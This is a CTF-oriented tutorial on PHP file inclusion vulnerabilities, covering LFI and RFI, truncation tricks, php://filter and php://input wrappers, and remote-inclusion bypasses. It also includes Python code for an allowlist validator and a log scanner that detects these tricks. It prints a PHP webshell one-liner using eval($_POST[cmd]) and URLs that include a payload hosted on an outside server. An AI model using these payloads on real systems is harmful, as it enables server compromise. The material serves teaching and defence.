Common tests for file inclusion vulnerabilities

File Inclusion Vulnerabilities

Introduction to file inclusion

When writing a program, developers do not want to write the same code several times, so code that is needed repeatedly is usually written once in a single file and then simply called wherever it is needed instead of being rewritten; this process is called inclusion. The file to be called is referenced through a PHP function, and if the file name passed in is not properly validated, a file other than the intended one can be operated on, leading to unexpected or even malicious file disclosure and code injection.

Dangerous functions

The four PHP functions most commonly involved in file inclusion vulnerabilities are:

require()
require_once()
include()
include_once()

When these functions include a file, the file is parsed as PHP as long as its contents match PHP syntax, regardless of the file extension: an uploaded .txt or .jpg containing malicious code will be treated and executed by PHP as a PHP file.
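Because include() will execute whatever it is handed, the defence is to never let the raw parameter reach it. The validator below is an added example (not code from the original post) showing, in Python, the check a PHP application should perform before include(): it rejects every trick this page describes and then maps the value onto a fixed allowlist. The page names and the include directory are assumed placeholders.

```python
import os
import re
from typing import Optional

# Constructed allowlist: the only pages the application ever includes.
ALLOWED_PAGES = {"home", "about", "contact"}
# Assumed include directory (placeholder, not from the original page).
INCLUDE_DIR = "/var/www/app/pages"

# Any "scheme://" prefix (php://, file://, http://, ...) is a stream wrapper
# or remote URL and must never be passed to include().
SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://")


def resolve_include(filename: str) -> Optional[str]:
    """Return the absolute path to include, or None if the value is refused.

    `filename` is the value as PHP's $_GET already delivers it, i.e. URL
    decoded once, so %00 has become a real NUL byte.
    """
    # 1. NUL byte: the %00 truncation trick relies on the string ending early.
    if "\x00" in filename:
        return None
    # 2. Stream wrappers and remote URLs (php://filter, php://input, http://).
    if SCHEME_RE.match(filename):
        return None
    # 3. Path separators or '..': removes traversal and the '/./' and '.'
    #    padding used for the 256/4096-byte path length truncation trick.
    if "/" in filename or "\\" in filename or ".." in filename:
        return None
    # 4. Allowlist, not denylist: anything not a known page name is refused,
    #    so an oversized or odd value is never turned into a path at all.
    if filename not in ALLOWED_PAGES:
        return None
    return os.path.join(INCLUDE_DIR, filename + ".php")
```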

Classification

Local file inclusion
  • Read the flag file directly from the target machine
Remote file inclusion
  • Host a runnable PHP Trojan on a designated third-party server, get a webshell, and view the flag file

Problem-solving approach

Check the PHP global configuration file php.ini

   allow_url_fopen = on/off
   allow_url_include = on/off

Remote file inclusion is only possible when both of these are on.

Local file inclusion

  • Include the flag file directly

  • Read the flag from the PHP code via pseudo-protocols

  • Pass in a PHP Trojan to get a webshell, then get the flag

Include the flag file directly

%00 truncation

Terminator: \x00 -> %00

Path length truncation

Under Windows the maximum directory length is 256 bytes and the excess is discarded; under Linux the maximum directory length is 4096 bytes and the excess is discarded. Example:

http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

Dot truncation

On Windows, the number of dots needs to be longer than 256

http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

PHP pseudo-protocols

  • file:// - accesses the local file system
  • php:// - accesses the various input and output streams

file://

Usage: file://[absolute path and file name]

Conditions (php.ini): allow_url_fopen = off/on, allow_url_include = off/on

php://filter

Usage:

?filename=php://filter/convert.base64-encode/resource=xxx.php

Conditions (php.ini): allow_url_fopen = off/on, allow_url_include = off/on

Pass in a PHP Trojan to get a webshell, then get the flag

php://input

Usage: ?file=php://input, with the data passed in via POST

Conditions (php.ini): allow_url_fopen = off/on, allow_url_include = on

Trojan file (shell.php)

<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

Connect with China Chopper (菜刀) or AntSword (蚁剑)

Remote file inclusion

Question mark (?) bypass

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt?

Hash sign (#) bypass

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%23

%20 bypass

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%20
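All of the local and remote vectors on this page leave a recognisable shape in the web server's access log. The scanner below is an added example (not from the original post) that classifies each query parameter of constructed log lines into the tricks described here: NUL-byte truncation, php:// wrappers, remote URLs (with or without the ?, # and %20 suffixes), and the long '/./' or '.' padding used for path length truncation. The log format and the 256-byte padding threshold are assumptions.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

# Constructed access log lines (not captured from a real server); the
# request lines mirror the payload shapes discussed on this page.
LOG_LINES = [
    "GET /FI/FI.php?filename=home HTTP/1.1",
    "GET /FI/FI.php?filename=test.txt%00 HTTP/1.1",
    "GET /FI/FI.php?filename=php://filter/convert.base64-encode/resource=FI.php HTTP/1.1",
    "POST /FI/FI.php?file=php://input HTTP/1.1",
    "GET /FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%23 HTTP/1.1",
    "GET /FI/FI.php?filename=test.txt" + "/." * 300 + " HTTP/1.1",
    "GET /FI/FI.php?filename=test.txt" + "." * 300 + " HTTP/1.1",
]

# Other PHP stream wrappers worth flagging even though they are not the
# page's main examples (file:// is; the rest are assumed extras).
WRAPPER_RE = re.compile(r"^(file|data|phar|zip|glob|compress\.\w+)://", re.I)
# Heuristic: legitimate file names never carry this much './' or '.' padding.
PADDING_THRESHOLD = 256


def classify(value: str) -> Optional[str]:
    """Name the inclusion trick a single, URL-decoded parameter value matches."""
    if "\x00" in value:
        return "null-byte truncation"          # %00 decoded by the server
    if re.match(r"^php://", value, re.I):
        return "php:// wrapper"                # php://filter, php://input
    if re.match(r"^(https?|ftp)://", value, re.I):
        return "remote inclusion"              # trailing ?, # or space ignored
    if WRAPPER_RE.match(value):
        return "stream wrapper"
    padding = len(value) - len(value.rstrip("./"))
    if padding > PADDING_THRESHOLD:
        return "path length truncation"        # Windows 256 / Linux 4096 trick
    return None


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (parameter name, trick) for every suspicious value in the log."""
    findings = []
    for line in lines:
        parts = line.split(" ")
        if len(parts) < 2:
            continue
        # parse_qs URL-decodes once, exactly as PHP's $_GET does.
        params = parse_qs(urlparse(parts[1]).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                kind = classify(value)
                if kind is not None:
                    findings.append((name, kind))
    return findings
```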


Source: www.cnblogs.com/NPFS/p/12667021.html